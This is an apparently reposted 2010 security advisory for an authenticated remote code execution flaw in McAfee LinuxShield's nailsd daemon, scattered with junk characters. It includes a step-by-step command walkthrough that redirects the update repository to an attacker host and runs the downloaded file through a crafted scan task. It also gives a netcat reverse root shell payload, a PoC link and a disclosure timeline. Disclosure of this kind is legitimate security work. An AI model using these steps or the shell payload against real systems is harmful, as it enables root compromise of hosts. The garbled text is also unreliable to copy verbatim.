    LinuxShield uses a web-browser interface, and a large number of
    1 \- `" Z# ^5 G; W& WLinuxShield installations can be centrally controlled by ePolicy
    , C" I3 F( ?9 h2 d/ ^, TOrchestrator.* C5 V, Y( h/ C( c( h$ h& u
    3 ~- ]. v0 [- x7 g6 z
    (Product description from LinuxShield Product Guide), p. Y  C" K1 o- ?- P/ t& g8 R
    & ?- R6 e! g, g$ }: }& Q' Z
    ' ^) l* K* s+ ^1 p3 N

    : v) n: B* h; FDescription:
    + W, Q& G) G) I4 w6 x) x( l6 E============
    ! J8 K" u0 p: M. h/ r3 y
    ) s. Y8 {: q7 [# qThis vulnerability allows remote attackers to execute arbitrary code0 a3 d2 ^) a" _) \! e! `# h' z. d
    on vulnerable installations of McAfee LinuxShield. User interaction
    2 T. i( G/ d+ Q3 P+ cis not required to exploit this vulnerability but an attacker must$ G# t, r4 t* v8 y( l/ X
    be authenticated.$ l4 t# ]! P$ [# S0 m. ?
    * f9 d0 ?% ~/ G' I4 }2 z& c0 K
    The LinuxShield Webinterface communicates with the localy installed
    ; l" _3 r  o- E/ u" j  z7 v5 b"nailsd" daemon, which listens on port 65443/tcp, to do' |  A% B$ v' \0 e
    configuration9 U5 ^" l0 t3 e$ |! @
    changes, query the configuration and execute tasks./ ~5 h8 Z& t: o5 Q! L$ I

    : z$ F/ Q2 T3 j/ R" t4 _8 kEach user, which can login to the victim box, can also authenticate
    2 u8 M( p( t( v  Y' |it self to the "nailsd" and can do configuration changes and: ~% M% r2 b) u# q
    execute% Q7 q8 I; q5 Q6 i3 q1 e3 u
    tasks with root privileges.
    0 a3 O- E8 O; ~6 V, V$ p
    6 X* N0 d& M$ U+ XA direct execution of commands is not possible, but it is possible to
    - r! T5 _* `, [+ ?* i4 R! @download and execute code through manipulation of the config and
    9 r+ Y& `/ s- J0 O$ A5 Yexecute schedule tasks of the LinuxShield.
    3 J, U: v3 A  z9 X
    ! X+ Q) P) L. v0 b$ t) \, w, e( P; O
    walk-through (after the TLS handshake):
    % C1 A, g$ K3 N4 f+--------------------------------------
    ! u4 k& I8 G! p5 O' {1 G/ c1 C
    3 w3 j" y# R- p2 V, Anailsd > +OK welcome to the NAILS Statistics Service
      e; Z+ F0 ~# O$ V5 h) Dattacker> auth <user> <pass>
    / D8 S  T* j/ x  d# unailsd > +OK successful authentication) d; M  W, _! L4 k+ P0 F
    - ?: {& U5 v) g: O
    # Set the Attacker repository to download our code from a httpd/ ?7 |5 a( Q8 {
    # (catalog.z)6 H/ L: J: W, w4 q  ^7 Y$ M
    #---------------------------------------------------------------6 ^2 r8 V! X" r: Y2 l' j
    attacker> db set 1 _table=repository status=1 siteList=<?xml version2 E; J5 k5 e7 v# m' s* v
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    * @' Q! F) m4 W: Z/ p6 Axmlns:ns="naSiteLi
    # p1 y% L5 k5 j% Lst" GlobalVersion="20030131003110"* V/ G" f$ ^* B& W* d! c; z9 s) S/ {
    LocalVersion="20091209
    : m. r; ?4 B; e0 h161903" Type="Client"><SiteList
    $ G' [" K* {  Z, V' _0 zDefault="1" Name="SomeGU
    4 n  B  c. v3 MID"><HttpSite Type="repository"2 B1 p$ N$ F# W! D8 N9 B; u' ~
    Name="EvilRepo" Order="1
    - ^" S5 i5 D" v, p* x+ J+ f" Server="<attackerhost>:80"! w5 v' S& w6 K  X1 M# O9 N: v7 R( A. i
    Enabled="1" Local="1"><Rela
    ( y& O; W( {: C, h5 S5 ]1 h) S8 E5 G0 M) o% T* q, s1 m- }
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use6 F% l/ U4 ^% v& }% b
    rName></  X5 e! }$ _# b& z+ x  F
    UserName><Password
    ! I' K3 `% n4 r' [2 T) XEncrypted="0"/></HttpSite></SiteList></
    ; ]$ i4 G0 z: D. Ons:SiteLists> _cmd=update
    . [5 ~; @: w: e$ }nailsd > +OK database changes buffered.. `4 o( h* d+ V- H  S$ B6 s5 f

    . i4 m! R( y2 t/ F8 H+ q3 M# z8 J; y* e2 L# Execute task to set the attacker repository
    . B! i9 u1 `( D5 s" v3 V#---------------------------------------------------------------
    # n$ A/ w8 K& M( _4 {1 j& l5 e8 C4 f2 Zattacker> task setsitelist, h' l. a7 I# j- f0 S. H; `
    nailsd > +OK setting sitelist from CMA.1 g2 V3 a6 y5 f, i) F8 @

    4 w4 U: e, f+ k. X9 V2 T# [3 y# Execute the default Update task to download the code! |: C0 @4 E; s8 k/ K
    #---------------------------------------------------------------7 p, E, v, ~1 h: `
    attacker> task nstart LinuxShield Update& V) X& ~$ f6 s/ k, Q* r5 k- c# b
    nailsd > +OK task LinuxShield Update starting
    ' x! J3 U! K( X3 T7 b& l' p8 k5 G0 Z: S5 F& {
    # Create a Scan profile, which executes our code. The profiles are
    8 C1 I$ N; Z( i& H4 p2 j% ?# not stored in the database./ s1 e8 _9 {  u
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg7 X. B  Z  b6 c- X0 E
    #---------------------------------------------------------------) ?; N* X7 r7 j& Q
    attacker> sconf ODS_99 begin/ J# l' X7 m) V$ Z$ ?5 j
    nailsd > +OK 1260400888# f' O& v7 F! E5 E2 s7 S& Y
    0 P- _) [! s! x( ?
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the. q5 [1 {0 x( A! M
    path/ F% U: y6 A  m9 W
    # where our earlier downloaded catalog.z file is stored.
      @" n! U! m; Z- I  j; L# (/opt/McAfee/cma/scratch/update/catalog.z). b/ D7 |' }7 s; D* N5 W0 B4 b
    #---------------------------------------------------------------
    4 Q7 q& z1 S: \* G0 Y" o3 U0 I4 Hattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    5 b( h' Z2 G; J1 Q% r& k/ H, Gtrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O  O5 k+ Q8 ]7 L5 x+ P" g- F8 f: M' ]# X
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    " Y/ K% C; x8 \  h4 |0 I10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng  O& F& `0 J& w( @5 F
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    ; s5 G9 }' V# _/ g* efile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD9 z# @; W  u$ A6 v' l, f! A
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    1 ], d$ w4 }, b5 \6 o; nginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    4 \% T( G, f' F7 w/ S  U& x.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu, _: m7 x) i9 Y" l* w$ V
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru% {7 Z" D( i' K5 x) Q' |1 J+ z
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    ) |; |" Y" x' p. w9 ].mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    ( U5 f# [$ x! x( t$ U! U6 y+ J' Rle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil+ f- E  `9 R$ E1 p: Q$ `
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin5 k6 p; i: t& J  [( `
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr& V3 G/ J( `6 ^/ U! f. k' J5 X
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    + r: K. b) G7 I' I: j2 y" E) ^" do=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile+ C4 g& `( B$ J" e; n
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    % C/ b) o! k* j( N0 x7 r/ Krue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat; ?) u8 h+ O/ n6 K2 d) p5 b
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    7 n# }4 G' I- {) P7 K00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    0 E8 n4 L! P) F0 U$ a  e3 U/ uODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil, s6 Q9 v; V' w1 K) B" v  B8 Z
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    9 v5 X' Y  ?# J4 C0 Cnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    8 D3 \& U* y, `5 F# K  @/ y0 cofile.ODS_99.filter.extensions.type=extension nailsd.profil
    0 Z0 `% D( A2 F% xe.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    : f1 R8 j7 l; t% U" K) X" n* b  w.action.Default.secondary=Quarantine nailsd.profile.ODS_99.+ w$ n  G( L7 s
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s* X5 s7 B8 h% Q# [0 `; d3 n: {6 b
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    + k2 D0 v% @2 ?# Rss nailsd.profile.ODS_99.action.error=Block
    3 I: Y& T( o# `1 znailsd > +OK configuration changes buffered4 W% o: X+ e; u5 r( s' g
    attacker> sconf ODS_99 commit 1260400888# q( y( E( w, z- c9 T
    nailsd > +OK configuration changes stored$ U& h2 ?. H) r9 l! B" e. Q
    6 J1 O1 m. e& X/ ^) o4 _
    # Set a scan task with the manipulated profile to execute the code
    6 ~) w: N) P: o* q#---------------------------------------------------------------
    * a) I7 `: H. Yattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    * k0 i8 v7 W2 y; lpe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    6 I: a/ N5 ~/ M! V8 T. s5 omp;exclude:false timetable=type=unscheduled taskResults=0 i6 V- c% S3 P" k- w, v
    _lastRun=1260318482 status=Stopped _cmd=insert
    % t9 |. W& ?& X( U6 F. cnailsd > +OK database changes buffered% m+ [& W- I1 t' Z

    * ~' \- D% T$ p# Execute scan task to execute the code
    ( j9 S% h: Y6 |+ I) P9 a#---------------------------------------------------------------& }; a3 N- x( [* a' |9 f/ c; _
    attacker> task nstart Evil Task) b) ]9 f& X) s" ]: K$ i
    ' M; D* \. \$ J8 \
    +-------------------------------------- walk-through EOF9 M, r3 r1 _& e3 U+ }$ g, I! W$ p: h9 K
    9 I0 E, T* D. `; c# |: c

    ) _. D0 W/ s" i# N" `0 wTo get a reverse root shell place something like this in the catalog.z
    . j/ G" k' N0 ^9 L( R* f6 u  s' f3 n0 x; M
    --- snip ---; E; k# Y0 A6 F0 i$ l
    #!/bin/sh
    & _4 E8 ]0 W! o  T/ `nc -nv <attacker_host> 4444 -e /bin/sh
    7 O. u+ _' O/ D--- /snip ---
    0 g5 ]' F1 O* v8 p
    # t6 l- Y! N9 i8 H# ]1 J$ {9 k
    & }  W' C3 V% G4 F
    % s9 Q& r& V. K. G* wProof of Concept :6 ?# w) h: C6 a/ c
    ==================
    : f" ^  W2 T8 r. h
    . Z! a8 @$ X, i9 q$ Rhttp://inj3ct0r.com/sploits/11165.tar.gz
    0 M; ~* M6 v3 S, U* K7 d$ w9 h4 I' q) ]' K. I0 E# J

    8 D9 y5 W; a% ^- k1 B" o8 Z2 N/ r  f
    Solution:
    ( ?& e. q: K1 _' U=========, |$ k) V9 R! ?) x6 ~  F3 O8 N$ M. e
    ; S0 M5 z' a6 q% ^5 J: o: ?  I
    McAfee Advisory
    8 u( f% S) Y+ G1 j, y+--------------. b# ?) l7 k- }2 i/ L% L8 W# T
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    4 X, J; D( `2 G4 M  D) v" Q( Z0 m7 R# n- p& ^! I+ [: j0 N/ K

    + _$ B8 i- D$ U; f1 j
    , S% L0 P$ X5 L! I  E8 W) V- lDisclosure Timeline (YYYY/MM/DD):0 b$ h! x* k. r
    =================================) T1 \3 U7 X  g: D. l7 ?& k/ \
    , J( `. y- N2 W5 M' ?. X
    2009.12.07: Vulnerability found
    ! w) p; H( c* l+ }  R5 }+ }; F2010.02.03: Asked vendor for a PGP key3 }& k1 U" w1 V  J4 x. T+ C# g
    2010.02.05: Vendor sent his PGP key3 `9 _) y/ |. h/ G
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure- i8 N# f" n+ {. {
    date (2010.02.18) to Vendor
    ) `5 V! v; {3 i5 {+ f2010.02.05: Vendor acknowledges the reception of the advisory+ [# }) c" X) f9 u6 b
    2010.02.16: Ask for a status update, because the planned release date is  i, t/ j3 ]" |+ p
    2010.02.18." b, ]. L+ c! {( g
    2010.02.16: Vendor response that, they are currently working on a patch
    ' g; g, `, i+ z* v( ^2010.02.17: Changed release date to 2010.02.25.
    7 }" Z( i. H/ Q2010.02.22: Vendor gives a status update, that they are able to release3 Z8 }# X% e$ T- X+ ?/ t& f
    the patch on 2010.02.25.
    / R7 j" T) Z7 a2010.02.24: Ask for a list of affected products and the advisory url.9 v* _( m, A' L: u2 i$ p
    2010.02.24: Vendor sends the list.' u* L9 \" _" y9 Z& _
    2010.03.02: Release of this Advisory
    3 @" p4 X2 y7 B7 x  ], [6 f1 B" H* p- w

    6 J+ x% {- z( [' N7 t9 P  d- P. o% w* X- W( a& A: }
    4 r5 y8 F  q- y) a" a( k) }
    ! E; o4 w, `0 j" _( u1 B4 M9 p
    : L" T* U! D  D
    $ j5 k# Q' U( k5 s. U- ^% N: z
    9 I: e: H. b4 D0 l) L# G' R8 s
    3 A8 i; W" R1 L3 ~, M5 W7 c

    1 x6 N0 U: h$ w2 A- [  M
    9 y. n9 d  w& J3 I7 i" c7 H( X) }5 J% k" [: q8 z1 y
    . \+ p/ u7 p: d6 j+ ~

    ! a7 s! P9 {/ p3 h: P
    # Z/ x2 g: V% K6 V5 A
    : o' b. A+ _" s) k, v- C3 B  \8 `  W

    % \4 \8 }1 ?; \, d7 O  r! |4 V) y

    ' b& ^3 E5 Q5 S- F; h
    $ j# \5 Q' o5 Q' P公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表